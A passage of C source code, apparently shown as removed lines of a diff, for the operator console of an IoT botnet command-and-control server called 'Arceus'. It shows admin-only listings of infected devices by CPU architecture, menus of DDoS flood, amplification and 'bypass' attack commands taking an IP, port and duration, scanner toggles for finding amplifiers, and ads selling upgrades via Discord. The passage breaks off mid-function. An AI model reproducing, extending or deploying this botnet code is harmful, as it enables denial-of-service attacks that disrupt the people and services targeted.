- if(send(clear_arceus_broadcast, start_3, strlen(start_3), MSG_NOSIGNAL) == -1) goto finish_integer; // Clear Screen From Broadcast -- We Are Stable !
- sleep (2);
- if(send(clear_arceus_broadcast, start_4, strlen(start_4), MSG_NOSIGNAL) == -1) goto finish_integer; // Clear Screen From Broadcast -- We Are Stable !
- sleep (2);
- if (send(clear_arceus_broadcast, "\033[1A\033[2J\033[1;1H", 14, MSG_NOSIGNAL) == -1) goto finish_integer; // Clear Screen From Broadcast -- We Are Stable !
- if(send(clear_arceus_broadcast, start_7, strlen(start_7), MSG_NOSIGNAL) == -1) goto finish_integer; // Clear Screen From Broadcast -- We Are Stable !
- sleep (2);
- if(send(clear_arceus_broadcast, start_8, strlen(start_8), MSG_NOSIGNAL) == -1) goto finish_integer; // Clear Screen From Broadcast -- We Are Stable !
- sleep (2);
- if (send(clear_arceus_broadcast, "\033[1A\033[2J\033[1;1H", 14, MSG_NOSIGNAL) == -1) goto finish_integer;
- if(send(clear_arceus_broadcast, start_9, strlen(start_9), MSG_NOSIGNAL) == -1) goto finish_integer; // Clear Screen From Broadcast -- We Are Stable !
- sleep (2);
- if(send(clear_arceus_broadcast, start_10, strlen(start_10), MSG_NOSIGNAL) == -1) goto finish_integer; // Clear Screen From Broadcast -- We Are Stable !
- sleep (2); // Clear Screen From Broadcast -- We Are Stable !
- if(send(clear_arceus_broadcast, start_12, strlen(start_12), MSG_NOSIGNAL) == -1) goto finish_integer; // Clear Screen From Broadcast -- We Are Stable !
- sleep (2);
- if(send(clear_arceus_broadcast, start_13, strlen(start_13), MSG_NOSIGNAL) == -1) goto finish_integer; // Clear Screen From Broadcast -- We Are Stable !
- sleep (5);
- if (send(clear_arceus_broadcast, "\033[1A\033[2J\033[1;1H", 14, MSG_NOSIGNAL) == -1) goto finish_integer;
- if(send(clear_arceus_broadcast, Arceus_1, strlen(Arceus_1), MSG_NOSIGNAL) == -1) goto finish_integer; // Each Line Set on [MSG_NOSIGNAL] - Broadcast
- while(1)
- { // We are Displaying Attempting to display main banner!
- sprintf(arceus, "\e[91m[\e[91m%s\e[91m@\e[91mArceus\e[91m]\e[38;5;154m$\e[91m ", accounts[find_line].username, arceus_buffer_size); // We are Displaying Attempting to display main banner!
- if(send(clear_arceus_broadcast, arceus, strlen(arceus), MSG_NOSIGNAL) == -1) goto finish_integer; // We are Displaying Attempting to display main banner!
- break; // World Break!
- } // We are Displaying Attempting to display main banner!
- pthread_create(&title, NULL, &arceus_title_creator, sock); // We are Displaying Attempting to display main banner!
- managements[clear_arceus_broadcast].transmitted_successfully = 1; // We are Displaying Attempting to display main banner!
- while(buffer_size_string_compare(arceus_buffer_size, sizeof arceus_buffer_size, clear_arceus_broadcast) > 0) // Buffer Size, Stated Less Than 0, This Allows Consistent Connection
- {
- if (strstr(arceus_buffer_size, ".bots")) // Output For Command - '.bots'
- {
- if(strcmp(Admin, accounts[find_line].identification_type) == 0) // Check If User Is Admin
- {
- char total_output[128]; // Char Every Line For Output Communication -- 128 byte
- char mips[128]; // Char Every Line For Output Communication
- char sh4[128]; // Char Every Line For Output Communication
- char arm[128]; // Char Every Line For Output Communication
- char ppc[128]; // Char Every Line For Output Communication
- char x86[128]; // Char Every Line For Output Communication
- char spc[128]; // Char Every Line For Output Communication
- char bot_1 [5000]; // Char Every Line For Output Communication
- char bot_2 [5000]; // Char Every Line For Output Communication
- char bot_3 [5000]; // Char Every Line For Output Communication
- char bot_4 [5000]; // Char Every Line For Output Communication
- sprintf(bot_1, "\e[91m╔════════════════════════════════════════════╗\r\n"); // Display Menu - Device Count - [ARCH DETECTION BROKEN, THIS IS STILL IN BETA]
- sprintf(bot_2, "\e[91m║ \e[91mArceus I \e[91m- \e[91mDevice Listing \e[91m- \e[91mArch Detection \e[91m║\r\n"); // Display Menu - Device Count - [ARCH DETECTION BROKEN, THIS IS STILL IN BETA]
- sprintf(bot_3, "\e[91m╠════════════════════════════════════════════╣\r\n");
- sprintf(mips, "\e[91m║ \e[91mMips Devices: \e[91m%d \e[91m║\r\n", arceus_mipsel_connected()); // Display Menu - Device Count - [ARCH DETECTION BROKEN, THIS IS STILL IN BETA]
- sprintf(arm, "\e[91m║ \e[91mArm Devices: \e[91m%d \e[91m║\r\n", arceus_arm_connected()); // Display Menu - Device Count - [ARCH DETECTION BROKEN, THIS IS STILL IN BETA]
- sprintf(sh4, "\e[91m║ \e[91mSh4 Devices: \e[91m%d \e[91m║\r\n", arceus_sh4_connected()); // Display Menu - Device Count - [ARCH DETECTION BROKEN, THIS IS STILL IN BETA]
- sprintf(ppc, "\e[91m║ \e[91mPpc Devices: \e[91m%d \e[91m║\r\n", arceus_ppc_connected()); // Display Menu - Device Count - [ARCH DETECTION BROKEN, THIS IS STILL IN BETA]
- sprintf(x86, "\e[91m║ \e[91mx86 Devices: \e[91m%d \e[91m║\r\n", arceus_x86_connected()); // Display Menu - Device Count - [ARCH DETECTION BROKEN, THIS IS STILL IN BETA]
- sprintf(spc, "\e[91m║ \e[91mSpc Devices: \e[91m%d \e[91m║\r\n", arceus_spc_connected()); // Display Menu - Device Count - [ARCH DETECTION BROKEN, THIS IS STILL IN BETA]
- sprintf(total_output, "\e[91m║ \e[91mTotal IoT Devices: \e[91m%d \e[91m║\r\n", arceus_clients_connected()); // Display Menu - Device Count - [ARCH DETECTION BROKEN, THIS IS STILL IN BETA]
- sprintf(bot_4, "\e[91m╚════════════════════════════════════════════╝\r\n");
- if (send(clear_arceus_broadcast, bot_1, strlen(bot_1), MSG_NOSIGNAL) == -1) goto finish_integer; // Each Line Set on [MSG_NOSIGNAL] - Broadcast
- if (send(clear_arceus_broadcast, bot_2, strlen(bot_2), MSG_NOSIGNAL) == -1) goto finish_integer; // Each Line Set on [MSG_NOSIGNAL] - Broadcast
- if (send(clear_arceus_broadcast, bot_3, strlen(bot_3), MSG_NOSIGNAL) == -1) goto finish_integer; // Each Line Set on [MSG_NOSIGNAL] - Broadcast
- if (send(clear_arceus_broadcast, mips, strlen(mips), MSG_NOSIGNAL) == -1) goto finish_integer; // Each Line Set on [MSG_NOSIGNAL] - Broadcast
- if (send(clear_arceus_broadcast, sh4, strlen(sh4), MSG_NOSIGNAL) == -1) goto finish_integer; // Each Line Set on [MSG_NOSIGNAL] - Broadcast
- if (send(clear_arceus_broadcast, arm, strlen(arm), MSG_NOSIGNAL) == -1) goto finish_integer; // Each Line Set on [MSG_NOSIGNAL] - Broadcast
- if (send(clear_arceus_broadcast, ppc, strlen(ppc), MSG_NOSIGNAL) == -1) goto finish_integer; // Each Line Set on [MSG_NOSIGNAL] - Broadcast
- if (send(clear_arceus_broadcast, x86, strlen(x86), MSG_NOSIGNAL) == -1) goto finish_integer; // Each Line Set on [MSG_NOSIGNAL] - Broadcast
- if (send(clear_arceus_broadcast, spc, strlen(spc), MSG_NOSIGNAL) == -1) goto finish_integer; // Each Line Set on [MSG_NOSIGNAL] - Broadcast
- if (send(clear_arceus_broadcast, total_output, strlen(total_output), MSG_NOSIGNAL) == -1) goto finish_integer; // Each Line Set on [MSG_NOSIGNAL] - Broadcast
- if (send(clear_arceus_broadcast, bot_4, strlen(bot_4), MSG_NOSIGNAL) == -1) goto finish_integer; // Each Line Set on [MSG_NOSIGNAL] - Broadcast
- }
- else // If The User Is Not Admin, Then Use Else Statement To Carry Out Following Output
- {
- sprintf(arceus, "\e[91m╔════════════════════════════════════════╗\r\n\e[91m║ \e[91mYou Do Not Have the needed Permissions \e[91m║\r\n\e[91m║ \e[91mTo View or use this command! \e[91m║\r\n\e[91m╚═══════════════════════════════╦════════╝\r\n \e[91m║\r\n \e[91m║\r\n \e[91m╔══════════════════════╩═══════════════════════════╗\r\n \e[91m║ \e[91m Want An Upgrade? Dm Me or zach on discord! \e[91m║\r\n \e[91m║ \e[91mGeorgia Cri#4337 \e[91m- \e[91mOwO \e[91m- \e[91mTransmissional#9845 \e[91m║\r\n \e[91m╚══════════════════════════════════════════════════╝\r\n");
- if(send(clear_arceus_broadcast, arceus, strlen(arceus), MSG_NOSIGNAL) == -1); // // Each Line Set on [MSG_NOSIGNAL] - Broadcast
- }
- }
- if(strstr(arceus_buffer_size, ".HELP") || strstr(arceus_buffer_size, ".help") || strstr(arceus_buffer_size, ".Help")) // Help Command - Displays Help Menu
- {
- char help_cmd1 [5000]; // Char Every Line For Output Communication
- sprintf(help_cmd1, " \e[91m╔══════════════════════════════════════════════╗\r\n \e[91m║ \e[91mArceus I \e[91m-\e[91m Main Command List \e[91m- \e[91mExtra Cmds \e[91m║\r\n \e[91m╠══════════════════════════════════════════════╣\r\n \e[91m║ \e[91m.stress \e[91m- \e[91mShows a list of available methods \e[91m║\r\n \e[91m║ \e[91m.clear \e[91m-\e[91m Clears the Screen \e[91m║\r\n \e[91m║ \e[91m.logout \e[91m- \e[91mLogs out, and closes the C2 \e[91m║\r\n \e[91m║ \e[91m.bots \e[91m- \e[91mShows a list of connected devices \e[91m║\r\n \e[91m║ \e[91m.info \e[91m- \e[91mShows a list of user information \e[91m║\r\n \e[91m║ \e[91m.tools \e[91m-\e[91m Shows a list of available tools \e[91m║\r\n \e[91m║ \e[91m.staff \e[91m- \e[91mAdministrators only! \e[91m║\r\n \e[91m║ \e[91m.vip \e[91m- \e[91mVIPs Only! \e[91m║\r\n \e[91m║ \e[91m.iphm \e[91m- \e[91mIPHM / AMP Based Attacks! \e[91m║\r\n \e[91m║ \e[91m.ipmi \e[91m- \e[91mIPHM / AMP Based Attacks v2! \e[91m║\r\n \e[91m║ \e[91m.scanners \e[91m- \e[91mAdministrators only! \e[91m║\r\n \e[91m╚══════════════════════════════════════════════╝\r\n");
- if(send(clear_arceus_broadcast, help_cmd1, strlen(help_cmd1), MSG_NOSIGNAL) == -1) goto finish_integer; // Each Line Set on [MSG_NOSIGNAL] - Broadcast
- pthread_create(&title, NULL, &arceus_title_creator, sock); // Use Pthread, To Broadcast Signal, MSG_NOSIGNAL Should Be == 0
- while(1)
- {
- sprintf(arceus, "\e[91m[\e[91m%s\e[91m@\e[91mArceus\e[91m]\e[38;5;154m$\e[91m ", accounts[find_line].username, arceus_buffer_size); // User Input - Hostname
- if(send(clear_arceus_broadcast, arceus, strlen(arceus), MSG_NOSIGNAL) == -1) goto finish_integer; // Each Line Set on [MSG_NOSIGNAL] - Broadcast
- break; // World Break!
- }
- continue;
- }
- if(strstr(arceus_buffer_size, ".IPHM") || strstr(arceus_buffer_size, ".iphm")) // Help Command - Displays Help Menu
- {
- char iphm_method1 [5000]; // Char Every Line For Output Communication
- sprintf(iphm_method1, "\e[91m╔═════════════════════════╗ ╔════════════════════╗ ╔════════════════════╗\r\n\e[91m║ \e[38;5;82mScanned Methods I \e[91m║ ║ \e[91mDefault Port\e[91m: \e[38;5;82m62141\e[91m║ ║\e[91m To Kill IPHM / AMP \e[91m║\r\n\e[91m╠═════════════════════════╣ ║ \e[91mDefault time\e[91m: \e[38;5;82m300 \e[91m║ ║\e[91m Based Attacks \e[91m║\r\n\e[91m║ \e[91m.ldap \e[91m[\e[91mIP\e[91m] \e[91m[\e[91mPORT\e[91m] \e[91m║ ║ \e[91mDefault Threads\e[91m: \e[38;5;82m2 \e[91m║ ║\e[91m Open a new window \e[91m║\r\n\e[91m║ \e[91m.ntp \e[91m[\e[91mIP\e[91m] \e[91m[\e[91mPORT\e[91m] \e[91m║ ║ \e[91mWorking On Manual \e[91m║ ║\e[91m And type \e[38;5;82m.kill \e[91m║\r\n\e[91m║ \e[91m.tftp \e[91m[\e[91mIP\e[91m] \e[91m[\e[91mPORT\e[91m] \e[91m║ ║ \e[91m Input For Users \e[91m║ ║\e[91m Hope you enjoy! \e[91m║\r\n\e[91m║ \e[91m.ssdp \e[91m[\e[91mIP\e[91m] \e[91m[\e[91mPORT\e[91m] \e[91m║ ╚════════════════════╝ ╚════════════════════╝\r\n\e[91m║ \e[91m.portmap \e[91m[\e[91mIP\e[91m] \e[91m[\e[91mPORT\e[91m] \e[91m║ ╔════════════════════╗ ╔════════════════════╗\r\n\e[91m║ \e[91m.chargen \e[91m[\e[91mIP\e[91m] \e[91m[\e[91mPORT\e[91m] \e[91m║ ║ \e[38;5;82m Server Methods I \e[91m║ ║ \e[38;5;82mBypass Methods II \e[91m║\r\n\e[91m║ \e[91m.sentinel \e[91m[\e[91mIP\e[91m] \e[91m[\e[91mPORT\e[91m] \e[91m║ ╠════════════════════╣ ╠════════════════════\e[91m╣\r\n\e[91m║ \e[91m.netbios \e[91m[\e[91mIP\e[91m] \e[91m[\e[91mPORT\e[91m] \e[91m║ ║ \e[91m.winsyn \e[91m[\e[91mIP\e[91m] \e[91m║ ║ \e[91m.ovhbypass \e[91m[\e[91mIP\e[91m] \e[91m║\r\n\e[91m║ \e[91m.mssql \e[91m[\e[91mIP\e[91m] \e[91m[\e[91mPORT\e[91m] \e[91m║ ║ \e[91m.winseqid \e[91m[\e[91mIP\e[91m] \e[91m║ ║ \e[91m.cfbypass \e[91m[\e[91mURL\e[91m] \e[91m║\r\n\e[91m║ \e[91m.ts3 \e[91m[\e[91mIP\e[91m] \e[91m[\e[91mPORT\e[91m] \e[91m║ ║ \e[91m.yubina \e[91m[\e[91mIP\e[91m] \e[91m║ ║ \e[91m.nfobypass \e[91m[\e[91mIP\e[91m] \e[91m║\r\n\e[91m╚═════════════════════════╝ ║ \e[91m.prowin \e[91m[\e[91mIP\e[91m] \e[91m║ ║ \e[91m.bo4bypass \e[91m[\e[91mIP\e[91m] \e[91m║\r\n\e[91m╔═════════════════════════╗ ╠════════════════════╣ ╠════════════════════╣\r\n\e[91m║ \e[38;5;82m VIP Methods I \e[91m║ ║ \e[38;5;82m Extra Methods I \e[91m║ ║ \e[38;5;82mExtra Methods II \e[91m║\r\n\e[91m╠═════════════════════════╣ ╠════════════════════╣ ╠════════════════════\e[91m╣\r\n\e[91m║ \e[91m.HUN-FUN \e[91m[\e[91mIP\e[91m] \e[91m[\e[91mPORT\e[91m] \e[91m║ ║ \e[91m.vse \e[91m[\e[91mIP\e[91m] \e[91m║ ║ \e[91m.essyn \e[91m[\e[91mIP\e[91m] \e[91m[\e[91mPORT\e[91m] \e[91m║\r\n\e[91m║ \e[91m.ASS-CRK \e[91m[\e[91mIP\e[91m] \e[91m[\e[91mPORT\e[91m] \e[91m║ ║ \e[91m.telnet \e[91m[\e[91mIP\e[91m] \e[91m║ ║ \e[91m.csyn \e[91m[\e[91mIP\e[91m] \e[91m[\e[91mPORT\e[91m] \e[91m║\r\n\e[91m║ \e[91m.EFT-PWR \e[91m[\e[91mIP\e[91m] \e[91m[\e[91mPORT\e[91m] \e[91m║ ║ \e[91m.tbuse \e[91m[\e[91mIP\e[91m] \e[91m[\e[91mPORT\e[91m] \e[91m║ ║ \e[91m.xsyn \e[91m[\e[91mIP\e[91m] \e[91m[\e[91mPORT\e[91m] \e[91m║\r\n\e[91m║ \e[91m.PMP-PMP \e[91m[\e[91mIP\e[91m] \e[91m[\e[91mPORT\e[91m] \e[91m║ ║ \e[91m.udbs \e[91m[\e[91mIP\e[91m] \e[91m[\e[91mPORT\e[91m] \e[91m║ ║ \e[91m.zsyn \e[91m[\e[91mIP\e[91m] \e[91m[\e[91mPORT\e[91m] \e[91m║\r\n\e[91m║ \e[91m.ZCH-CRI \e[91m[\e[91mIP\e[91m] \e[91m[\e[91mPORT\e[91m] \e[91m║ ║ \e[91m.dom \e[91m[\e[91mIP\e[91m] \e[91m[\e[91mPORT\e[91m] \e[91m║ ║ \e[91m.issyn \e[91m[\e[91mIP\e[91m] \e[91m[\e[91mPORT\e[91m] \e[91m║\r\n\e[91m╚═════════════════════════╝ ╚════════════════════╝ ╚════════════════════╝\r\n");
- if(send(clear_arceus_broadcast, iphm_method1, strlen(iphm_method1), MSG_NOSIGNAL) == -1) goto finish_integer;
- pthread_create(&title, NULL, &arceus_title_creator, sock); // Use Pthread, To Broadcast Signal, MSG_NOSIGNAL Should Be == 0
- while(1)
- {
- sprintf(arceus, "\e[91m[\e[91m%s\e[91m@\e[91mArceus\e[91m]\e[38;5;154m$\e[91m ", accounts[find_line].username, arceus_buffer_size); // User Input - Hostname
- if(send(clear_arceus_broadcast, arceus, strlen(arceus), MSG_NOSIGNAL) == -1) goto finish_integer; // Each Line Set on [MSG_NOSIGNAL] - Broadcast
- break; // World Break!
- }
- continue;
- }
- if(strstr(arceus_buffer_size, ".IPMI") || strstr(arceus_buffer_size, ".ipmi")) // Help Command - Displays Help Menu
- {
- char ipmi_method1 [5000]; // Char Every Line For Output Communication
- sprintf(ipmi_method1, "\e[91m╔═════════════════════════╗ ╔════════════════════╗ ╔════════════════════╗\r\n\e[91m║ \e[38;5;82mScanned Methods II \e[91m║ ║ \e[91mDefault Port\e[91m:\e[38;5;82m 62141\e[91m║ ║\e[91m To Kill IPHM / AMP \e[91m║\r\n\e[91m╠═════════════════════════╣ ║ \e[91mDefault time\e[91m:\e[38;5;82m 300 \e[91m║ ║\e[91m Based Attacks \e[91m║\r\n\e[91m║ \e[91m.dns \e[91m[\e[91mIP\e[91m] \e[91m[\e[91mPORT\e[91m] \e[91m║ ║ \e[91mDefault Threads\e[91m:\e[38;5;82m 2 \e[91m║ ║\e[91m Open a new window \e[91m║\r\n\e[91m║ \e[91m.mdns \e[91m[\e[91mIP\e[91m] \e[91m[\e[91mPORT\e[91m] \e[91m║ ║ \e[91mWorking On Manual \e[91m║ \e[91m║\e[91m And type \e[38;5;82m.kill \e[91m║\r\n\e[91m║ \e[91m.db2 \e[91m[\e[91mIP\e[91m] \e[91m[\e[91mPORT\e[91m] \e[91m║ ║ \e[91m Input For Users \e[91m║ \e[91m║\e[91m Hope you enjoy! \e[91m║\r\n\e[91m║ \e[91m.arceus \e[91m[\e[91mIP\e[91m] \e[91m[\e[91mPORT\e[91m] \e[91m║ ╚════════════════════╝ ╚════════════════════╝\r\n\e[91m║ \e[91m.echo \e[91m[\e[91mIP\e[91m] \e[91m[\e[91mPORT\e[91m] \e[91m║ ╔════════════════════╗ ╔════════════════════╗\r\n\e[91m║ \e[91m.snmp \e[91m[\e[91mIP\e[91m] \e[91m[\e[91mPORT\e[91m] \e[91m║ ║ \e[38;5;82mVIP Methods II \e[91m║ ║ \e[38;5;82mLayer7 Methods I \e[91m║\r\n\e[91m║ \e[91m.memcache \e[91m[\e[91mIP\e[91m] \e[91m[\e[91mPORT\e[91m] \e[91m║ ╠════════════════════╣ ╠════════════════════╣\r\n\e[91m║ \e[91m.rip \e[91m[\e[91mIP\e[91m] \e[91m[\e[91mPORT\e[91m] \e[91m║ ║ \e[91m.msqdnm \e[91m[\e[91mIP\e[91m] \e[91m[\e[91mPORT\e[91m]\e[91m║ ║ \e[38;5;82mCOMING SOON \e[91m║\r\n\e[91m║ \e[91m.reaper \e[91m[\e[91mIP\e[91m] \e[91m[\e[91mPORT\e[91m] \e[91m║ ║ \e[91m.tfdnp \e[91m[\e[91mIP\e[91m] \e[91m[\e[91mPORT\e[91m] \e[91m║ ║ \e[91m.omega \e[91m[\e[91mURL\e[91m] \e[91m║\r\n\e[91m║ \e[91m.heartbeat \e[91m[\e[91mIP\e[91m] \e[91m[\e[91mPORT\e[91m] \e[91m║ ║ \e[91m.lndp \e[91m[\e[91mIP\e[91m] \e[91m[\e[91mPORT\e[91m] \e[91m║ ║ \e[91m.arme \e[91m[\e[91mURL\e[91m] \e[91m║\r\n\e[91m╚═════════════════════════╝ ║ \e[91m.ardmsp \e[91m[\e[91mIP\e[91m] \e[91m[\e[91mPORT\e[91m]\e[91m║ ║ \e[38;5;82mCOMING SOON \e[91m║\r\n\e[91m╔═════════════════════════╗ ╠════════════════════╣ ╠════════════════════╣\r\n\e[91m║ \e[38;5;82mTCP-Collection \e[91m║ ║ \e[38;5;82mExtra Methods III \e[91m║ ║ \e[38;5;82mExtra Methods IV \e[91m║\r\n\e[91m╠═════════════════════════╣ ╠════════════════════╣ ╠════════════════════╣\r\n\e[91m║ \e[91m.psh \e[91m[\e[91mIP\e[91m] \e[91m║ ║ \e[91m.gnade \e[91m[\e[91mIP\e[91m] \e[91m[\e[91mPORT\e[91m] ║ ║ \e[91m.uvse \e[91m[\e[91mIP\e[91m] \e[91m[\e[91mPORT\e[91m] \e[91m║\r\n\e[91m║ \e[91m.rst \e[91m[\e[91mIP\e[91m] \e[91m║ ║ \e[91m.zap \e[91m[\e[91mIP\e[91m] \e[91m[\e[91mPORT\e[91m] ║ ║ \e[91m.uvsd \e[91m[\e[91mIP\e[91m] \e[91m[\e[91mPORT\e[91m] \e[91m║\r\n\e[91m║ \e[91m.fin \e[91m[\e[91mIP\e[91m] \e[91m║ ║ \e[91m.rawudp \e[91m[\e[91mIP\e[91m] ║ ║ \e[91m.ejunk \e[91m[\e[91mIP\e[91m] \e[91m[\e[91mPORT\e[91m] \e[91m║\r\n\e[91m║ \e[91m.xmas \e[91m[\e[91mIP\e[91m] \e[91m║ ║ \e[91m.bogus \e[91m[\e[91mIP\e[91m] \e[91m[\e[91mPORT\e[91m] ║ ║ \e[91m.xanax \e[91m[\e[91mIP\e[91m] \e[91m║\r\n\e[91m║ \e[91m.ack \e[91m[\e[91mIP\e[91m] \e[91m║ ║ \e[91m.wizard \e[91m[\e[91mIP\e[91m] \e[91m[\e[91mPORT\e[91m]║ ║ \e[91m.frag \e[91m[\e[91mIP\e[91m] \e[91m[\e[91mPORT\e[91m] \e[91m║\r\n\e[91m╚═════════════════════════╝ ╚════════════════════╝ ╚════════════════════╝\r\n");
- if(send(clear_arceus_broadcast, ipmi_method1, strlen(ipmi_method1), MSG_NOSIGNAL) == -1) goto finish_integer;
- pthread_create(&title, NULL, &arceus_title_creator, sock); // Use Pthread, To Broadcast Signal, MSG_NOSIGNAL Should Be == 0
- while(1)
- {
- sprintf(arceus, "\e[91m[\e[91m%s\e[91m@\e[91mArceus\e[91m]\e[38;5;154m$\e[91m ", accounts[find_line].username, arceus_buffer_size); // User Input - Hostname
- if(send(clear_arceus_broadcast, arceus, strlen(arceus), MSG_NOSIGNAL) == -1) goto finish_integer; // Each Line Set on [MSG_NOSIGNAL] - Broadcast
- break; // World Break!
- }
- continue;
- }
- if(strstr(arceus_buffer_size, ".scanner") || strstr(arceus_buffer_size, ".SCANNER")) // Help Command - Displays Help Menu
- {
- char scanner_1 [5000]; // Char Every Line For Output Communication
- sprintf(scanner_1, "\e[91m╔═════════════════════════╗\r\n\e[91m║ \e[91mArceus I \e[91m- \e[91mIPHMScanners \e[91m║\r\n\e[91m╠═════════════════════════╣ ╔═════════════════╗\r\n\e[91m║ \e[91m.lds \e[91mon \e[91m|| \e[91m.lds \e[91moff \e[91m║ ║ \e[91mLDAP Scanner \e[91m║\r\n\e[91m║ \e[91m.nts \e[91mon \e[91m|| \e[91m.nts \e[91moff \e[91m║ ║ \e[91mNTP Scanner \e[91m║\r\n\e[91m║ \e[91m.tfs \e[91mon \e[91m|| \e[91m.tfs \e[91moff \e[91m║ ║ \e[91mTFTP Scanner \e[91m║\r\n\e[91m║ \e[91m.sds \e[91mon \e[91m|| \e[91m.sds \e[91moff \e[91m║ ║ \e[91mSSDP Scanner \e[91m║\r\n\e[91m║ \e[91m.pos \e[91mon \e[91m|| \e[91m.pos \e[91moff \e[91m║ ║ \e[91mPortmap Scanner \e[91m║\r\n\e[91m║ \e[91m.cos \e[91mon \e[91m|| \e[91m.cos \e[91moff \e[91m║ ║ \e[91mChargen Scanner \e[91m║\r\n\e[91m║ \e[91m.sos \e[91mon \e[91m|| \e[91m.sos \e[91moff \e[91m║ ║ \e[91mSentinel Scanner\e[91m║\r\n\e[91m║ \e[91m.nes \e[91mon \e[91m|| \e[91m.nes \e[91moff \e[91m║ ║ \e[91mNetBios Scanner \e[91m║\r\n\e[91m║ \e[91m.mss \e[91mon \e[91m|| \e[91m.mss \e[91moff \e[91m║ ║ \e[91mMSSQL Scanner \e[91m║\r\n\e[91m║ \e[91m.tss \e[91mon \e[91m|| \e[91m.tss \e[91moff \e[91m║ ║ \e[91mTS3 Scanner \e[91m║\r\n\e[91m╚═════════════════════════╝ ╚═════════════════╝\r\n");
- if(send(clear_arceus_broadcast, scanner_1, strlen(scanner_1), MSG_NOSIGNAL) == -1) goto finish_integer;
- pthread_create(&title, NULL, &arceus_title_creator, sock); // Use Pthread, To Broadcast Signal, MSG_NOSIGNAL Should Be == 0
- while(1)
- {
- sprintf(arceus, "\e[91m[\e[91m%s\e[91m@\e[91mArceus\e[91m]\e[38;5;154m$\e[91m ", accounts[find_line].username, arceus_buffer_size); // User Input - Hostname
- if(send(clear_arceus_broadcast, arceus, strlen(arceus), MSG_NOSIGNAL) == -1) goto finish_integer; // Each Line Set on [MSG_NOSIGNAL] - Broadcast
- break; // World Break!
- }
- continue;
- }
- if(strstr(arceus_buffer_size, ".clear") || strstr(arceus_buffer_size, ".CLEAR") || strstr(arceus_buffer_size, "CLEAR") || strstr(arceus_buffer_size, "clear")) // Clear The Screen - We Love Cleanliness
- {
- if (send(clear_arceus_broadcast, "\033[1A\033[2J\033[1;1H", 14, MSG_NOSIGNAL) == -1) goto finish_integer;
- if(send(clear_arceus_broadcast, Arceus_1, strlen(Arceus_1), MSG_NOSIGNAL) == -1) goto finish_integer; // Each Line Set on [MSG_NOSIGNAL] - Broadcast
- pthread_create(&title, NULL, &arceus_title_creator, sock); // Use Pthread, To Broadcast Signal, MSG_NOSIGNAL Should Be == 0
- while(1)
- {
- sprintf(arceus, "\e[91m[\e[91m%s\e[91m@\e[91mArceus\e[91m]\e[38;5;154m$\e[91m ", accounts[find_line].username, arceus_buffer_size); // User Input [Hostname]
- if(send(clear_arceus_broadcast, arceus, strlen(arceus), MSG_NOSIGNAL) == -1) goto finish_integer; // Each Line Set on [MSG_NOSIGNAL] - Broadcast
- break; // World Break!
- }
- continue;
- }
- if(strstr(arceus_buffer_size, ".STRESS") || strstr(arceus_buffer_size, ".stress")) // Display Menu - Stress Menu
- {
- char method_1 [5000]; // Char Every Line For Output Communication
- sprintf(method_1, "\e[91m╔═════════════════════════════════════════════════════╗ \r\n\e[91m║ \e[91mArceus I \e[91m- \e[91mDDoS Method Listing \e[91m- \e[91mAttack Method CmDs \e[91m║ \r\n\e[91m╠═════════════════════════════════════════════════════╣ \r\n\e[91m║ \e[91m.STD \e[91m[\e[91mIP\e[91m] [\e[91mPORT\e[91m] [\e[91mTIME\e[91m] \e[91m║ ╔══════════════════════╗\r\n\e[91m║ \e[91m.UDP \e[91m[\e[91mIP\e[91m] [\e[91mPORT\e[91m] [\e[91mTIME\e[91m] \e[91m32 1460 10 \e[91m║ ║ \e[91mSuggested Port\e[91m:\e[91m62627 \e[91m║\r\n\e[91m║ \e[91m.JUNK \e[91m[\e[91mIP\e[91m] [\e[91mPORT\e[91m] [\e[91mTIME\e[91m] \e[91m║ ║ \e[91mSuggested PSize\e[91m:\e[91m1460 \e[91m║\r\n\e[91m║ \e[91m.STOMP \e[91m[\e[91mIP\e[91m] [\e[91mPORT\e[91m] [\e[91mTIME\e[91m] \e[91m32 ALL 1460 10 \e[91m║ ║ \e[91mSuggested Method\e[91m:\e[91mSTD \e[91m║\r\n\e[91m║ \e[91m.TCP \e[91m[\e[91mIP\e[91m] [\e[91mPORT\e[91m] [\e[91mTIME\e[91m] \e[91m32 \e[91m(\e[91mFlags\e[91m/\e[91mALL\e[91m)\e[91m 0 10 \e[91m║ ║ \e[91mSuggested Method\e[91m:\e[91mUDP \e[91m║\r\n\e[91m║ \e[91m.COMBO \e[91m[\e[91mIP\e[91m] [\e[91mPORT\e[91m] [\e[91mTIME\e[91m] \e[91m║ ║ \e[91mMax Time\e[91m: \e[91m300 \e[91m║\r\n\e[91m║ \e[91m.CRUSH \e[91m[\e[91mIP\e[91m] [\e[91mPORT\e[91m] [\e[91mTIME\e[91m] \e[91m32 ALL 1460 10 \e[91m║ ╚══════════════════════╝\r\n\e[91m║ \e[91m.STOP \e[91m[\e[91mThis will stop your attack!\e[91m] \e[91m║ \r\n\e[91m╚═════════════════════════════════════════════════════╝\r\n");
- // Crush, Junk, Stomp > Taken Out Lynx -- Unstable And Causes Some Define Allocation Errors - [Will Be Fixed In ALpha]
- if(send(clear_arceus_broadcast, method_1, strlen(method_1), MSG_NOSIGNAL) == -1) goto finish_integer; // Each Line Set on [MSG_NOSIGNAL] - Broadcast
- pthread_create(&title, NULL, &arceus_title_creator, sock); // Use Pthread, To Broadcast Signal, MSG_NOSIGNAL Should Be == 0
- while(1)
- {
- sprintf(arceus, "\e[91m[\e[91m%s\e[91m@\e[91mArceus\e[91m]\e[38;5;154m$\e[91m ", accounts[find_line].username, arceus_buffer_size); // User Input - Hostname
- if(send(clear_arceus_broadcast, arceus, strlen(arceus), MSG_NOSIGNAL) == -1) goto finish_integer; // Each Line Set on [MSG_NOSIGNAL] - Broadcast
- break; // World Break!
- }
- continue; // Yep...
- }
- if(strstr(arceus_buffer_size, ".staff") || strstr(arceus_buffer_size, ".STAFF")) // Staff Only ! - Display Menu
- {
- pthread_create(&title, NULL, &arceus_title_creator, sock);
- char staff_cmd1 [5000]; // Char Every Line For Output Communication
